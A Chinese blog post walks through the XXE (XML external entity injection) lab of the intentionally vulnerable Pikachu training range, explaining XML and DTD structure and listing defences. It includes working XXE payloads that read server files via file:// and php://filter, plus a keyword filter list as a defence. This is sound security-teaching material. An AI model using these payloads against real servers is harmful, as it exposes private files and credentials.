Pikachu系列——XXE

最新推荐文章于 2024-03-16 20:35:30 发布
最新推荐文章于 2024-03-16 20:35:30 发布
阅读量1.3k 收藏 1
点赞数 2
分类专栏: Web安全攻防 文章标签: web 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Zlirving_/article/details/106274289
版权

Pikachu靶场系列持续更新~

 
要像追剧追番一样追下去哦
 

实验九 —— XXE

XXE概述

xml外部实体注入
攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题。xxe漏洞触发的点往往是可以上传xml文件的位置,也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。

危害
加载恶意外部xml文件
文件读取
命令执行
内网端口扫描
攻击内网网站
发起dos攻击等危害

XML概念
XML是可扩展的标记语言,设计用来进行数据的传输和存储, 结构是树形结构,有标签构成,这点很像HTML语言。但是XML和HTML有明显区别如下:
XML ----- 被设计用来传输和存储数据
HTML ----- 被设计用来显示数据

XML结构

第一部分:XML声明部分
<?xml version="1.0"?>

第二部分:文档类型定义 DTD
<!DOCTYPE note[ 
<!--定义此文档是note类型的文档-->
<!ENTITY entity-name SYSTEM "URI/URL">
<!--外部实体声明-->
]>

第三部分:文档元素
<note>
<to>Dave</to>
<from>Tom</from>
<head>Reminder</head>
<body>You are a good man</body>
</note>

其中,DTD(文档类型定义),用来为 XML 文档定义语法约束,可以是内部申明也可以使引用外部DTD。
① 内部申明DTD格式
<!DOCTYPE 根元素 [元素申明]>
② 外部引用DTD格式
<!DOCTYPE 根元素 SYSTEM "外部DTD的URI">
③ 引用公共DTD格式
<!DOCTYPE 根元素 PUBLIC "DTD标识名" "公共DTD的URI">

XML中对数据的引用称为实体,实体中有一类叫外部实体,用来引入外部资源,有SYSTEM和PUBLIC两个关键字,表示实体来自本地计算机还是公共计算机,外部实体的引用可以借助各种伪协议,比如如下三种,具体的示例可以看下面的xxe靶场实验:
file:///path/file.ext
http://url
php://filter/read=convert.base64-encode/resource=conf.php

防御:
①禁用外部实体
PHP:
libxml_disable_entity_loader(true);
JAVA:
DocumentBuilderFactory dbf =DocumentBuilderFactory.newInstance(); dbf.setExpandEntityReferences(false);
Python:
from lxml import etree xmlData = etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))
②过滤用户提交的XML数据
过滤关键词:<!DOCTYPE和<!ENTITY,或者SYSTEM和PUBLIC。
 

实验环境

我用的是phpstudy集成环境,一键搭环境 (如果端口没被占用还是比较顺利的)

靶场:Pikachu靶场下载
浏览器一个

接下来:
–>把下载下来的pikachu文件夹放到web服务器根目录下
–>根据实际情况修改inc/config.inc.php里面的数据库连接配置(登录名和密码要与数据库相同)
–>访问http://x.x.x.x/pikachu,会有一个红色的热情提示"欢迎使用,pikachu还没有初始化,点击进行初始化安装!",点击即可完成安装。
 

XXE

先提交一个正常的 xml 数据

<?xml version = "1.0"?>
<!DOCTYPE note [ <!ENTITY xxe "test"> ]>
<name>&xxe;</name>

payload中 &xxe; 是用来将xxe这个实体进行调用,xxe实体成功在前端回显。
在这里插入图片描述
读取服务器/本地文件(事先创建一个文本文件)
在这里插入图片描述
提交下面这样的payload,利用file://协议就能看到服务器/主机上的文件内容
这个XXE的file://协议一开始我用的5.3版本(失败),后来换的5.4的php环境才成功

<?xml version = "1.0"?>
<!DOCTYPE ANY [ <!ENTITY xxe SYSTEM "file:///D://phpStudy//PHPTutorial//WWW//pikachu//xxe.txt"> ]>
<x>&xxe;</x>

在这里插入图片描述
利用php://协议的filter过滤器以base64格式读取服务器/本地文件

<?xml version = "1.0"?>  
<!DOCTYPE ANY [ <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=xxe.php"> ]>   
<x>&xxe;/x>

在这里插入图片描述
GOT IT!

 
******************************************************
这一XXE模块先搞定了,关注收藏追更哦~

想冲大厂的癞蛤蟆
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pikachu渗透测试平台,最新版本,最稳定版本
06-28
对于学习渗透测试的人来说,找到一个目标用来练习渗透测试技术很重要,尤其是现在国家在这方面的监管很严格,所以搭建一个渗透测试平台用来练习是很多学习渗透测试的人特别是初学者的最佳选择。Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。这个平台使用php搭建,需要php环境和mysql数据库支持,我们可以使用phpstudy集成环境。与dvwa相比,Pikachu的每类漏洞根据不同的情况分别设计了不同的子类,同时,为了让这些漏洞变的有意思一些,在Pikachu平台上为每个漏洞都设计了一些小的场景,点击漏洞页面右上角的"提示"可以查看到帮助信息。 安装以及使用: 1、将压缩包放至phpstudy/www网站根目录下解压修改配置文件/pikachu-master/inc/config.inc.php 2、打开phopstudy集成环境,启动apache和mysql数据库 3、浏览器访问http://127.0.0.1/pikachu-master/进入主页面
pikache靶场通关——XXE
p36273的博客
11-02 208
关卡样式: 输入123,查看结果: 输入123后,显示上图数据,说明这里输入的XML格式错误查看抓取的数据包: 抓到的数据包如上输入的XML格式: 在BP数据包中修改后重发送 发现还是报错。在靶场中输入: 这里发现竟然输入正确了。这其中有什么区别呢?使用BP抓包看一看 这里发现被URL编码了 这里就成功读取到指定的文件内容了。这里需要使用3台机器模拟: 这里地区实现无回显了。 返回DNSLog查看 的确接收到了,这就说明XXE是存在的。 注意:这里的IP地址是写模拟外网接收服务器的IP地
XXE(XML外部实体注入)漏洞分析——pikachu靶场复现
qq_45612828的博客
08-02 6543
XXE(XML外部实体注入)漏洞分析——pikachu靶场复现
十一、pikachuXXE
qq_55202378的博客
08-25 503
pikachu XXE
pikachu XXE (XML外部实体注入)(皮卡丘漏洞平台通关系列
箭雨镜屋
02-17 6386
一、来自官方的介绍以及来自民间的扩展 1、pikachu官方简介 2、小女子之前画的脑图 3、两个个人感觉不错的博客 https://www.freebuf.com/articles/web/177979.html https://lalajun.github.io/2019/12/03/WEB-XXE/ ...
pikachu靶场之XXE漏洞详解
lxz021202的博客
03-02 1338
然后观察请求行、Accept、Content-Type,这里可以从Accept中发现能够接收的文档类型包括xml。上图说明目标主机访问了代码中的网址,那就说明目标主机能够解析xml代码,所以可能存在xxe漏洞。然后在Kali中编辑一个文件xxe.dtd(需要在存在这个文件的目录下开启HTTP服务)这段代码是用来读取本机中的123.txt文件,马赛克处是Kali的IP。这是个域名解析网站,在这里用来检验目标主机是否能够解析xml的代码。这个payload会调用Kali中的xxe.dtd文件。
pikachu LINUX安装包,
07-14
上传到根目录,解压直接就问访问,里面有教程
pikachu-master
05-04
Pikachu漏洞测试平台搭建详解》 在网络安全领域,漏洞测试是确保系统安全的重要环节。Pikachu,一个以小精灵命名的漏洞测试平台,因其易用性和实用性,成为了许多安全研究人员和初学者的首选工具。本文将详细介绍...
pikachu-master.zip
06-25
"Pikachu-master.zip"这个压缩包文件,无疑为我们提供了一个宝贵的网络安全学习资源——Pikachu靶场。靶场,是网络安全领域中的一个重要概念,它模拟真实网络环境,让学习者在可控的环境中实践和测试各种安全攻防...
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
pikachu靶场通关
11-19
pikachu靶场通关
pikachu--XXE
firecjh的博客
06-10 288
3)查看PHP源代码。(文件路径以自己实际电脑为准)XXE进入测试页面。
pikachu-文件上传+XXE+不安全的url跳转
qq_47804678的博客
03-22 303
们可以看到,刚把文件上传,还没有点击“开始上传”就已将弹出了警示框,没有交互就已经检测了文件的类型,说明他是在前端进行校验的。那么我们看一下代码:选择浏览,可以看到代码中有一个checkfiletxt()的函数:我们尝试看一下这个函数,果然是他,然后把onchange值改为空,将这个函数删除:再次尝试上传php文件,发现成功上传。(但是只要重新刷新页面,代码就会恢复。服务端check尝试上传php文件,点击上传发现禁止上传,提示只能是图片格式:是一种标准化的方式来表示文档的性质和格式。
Pikachu-XXE
baynk的博客
11-19 4006
0x00 XXE -“xml external entity injection” 既"xml外部实体注入漏洞"。 概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题" 也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。 现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从...
Pikachu靶场——XXE 漏洞
来日可期的博客
09-29 3680
XXE(XML External Entity)攻击是一种利用XML解析器漏洞的攻击。在这种攻击中,攻击者通过在XML文件中插入恶意实体来触发解析器加载恶意代码或文件,从而执行任意代码、读取本地文件等操作。在XXE攻击中,攻击者通常会构造一个包含恶意实体的XML文件,并将其提交到目标服务器上进行解析。当服务器使用XML解析器解析文件时,会读取实体并展开其定义,从而导致恶意代码被执行或文件被泄露。
Pikachu漏洞平台练习——XXE实体类型举例、Blind OOB XXE、其他协议、XXE漏洞读取文件
7Riven's blog
11-14 1474
1.XXE概述 XXE-“xml external entity injection”,即xml外部实体注入。 攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题,也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。 2.本地实体类型与外部的实体类型 本地实体类型举例说明如下: <?xml v...
XXE漏洞原理和pikachu靶场实验
最新发布
03-16 1057
本文介绍XXE漏洞原理、危害和分类,以及pikachu靶场XXE4个实验。
pikachuXXE漏洞
weixin_51446936的博客
06-18 2000
一、概述 XXE -“xml external entity injection”,即"xml外部实体注入漏洞"。 概括一下就是"攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题" 也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。 现在很多语言里面对应的解析xml的函数默认是禁止解析外部实体内容的,从而也就直接避免了这个漏洞。 以PHP为例,在PHP里面解析xml用的是libxml,其在≥2.9.0的版本中,默认
pikachuxxe
qq_43665434的博客
02-19 436
pikachuxxe XML基础知识 参考文章 一、什么是xxeXXE即“xml external entity injection”即“xml外部实体注入漏洞”。 攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题。 也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。 现在很多语言里对应的解析xml的函数默认是禁止解析xml外部实体内容的 就如在php中,对于xml的解析用的是libxml,在libxml版
pikachu XXE
08-31
pikachu是一个开源的漏洞扫描工具,XXE(XML External Entity)漏洞是其中一个模块。 XXE漏洞是指攻击者通过构造恶意的XML实体来访问本地或远程文件系统,从而获取敏感信息或执行任意代码。这样的漏洞通常出现在使用XML解析器的应用程序中,当应用程序没有正确配置解析器时,攻击者可以利用XXE漏洞来进行攻击。 在pikachu中,XXE模块可以帮助用户扫描和发现应用程序中的XXE漏洞,并提供修复建议。使用pikachu进行XXE扫描的过程包括将pikachu文件夹放到web服务器根目录下,修改配置文件中的数据库连接配置,然后访问相应的URL进行安装和初始化。 总结来说,pikachu是一个漏洞扫描工具,其中包含XXE漏洞模块,可以帮助用户发现和修复应用程序中的XXE漏洞。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [Pikachu系列——XXE](https://blog.csdn.net/Zlirving_/article/details/106274289)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [pikachuxxe](https://blog.csdn.net/qq_43665434/article/details/113867722)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值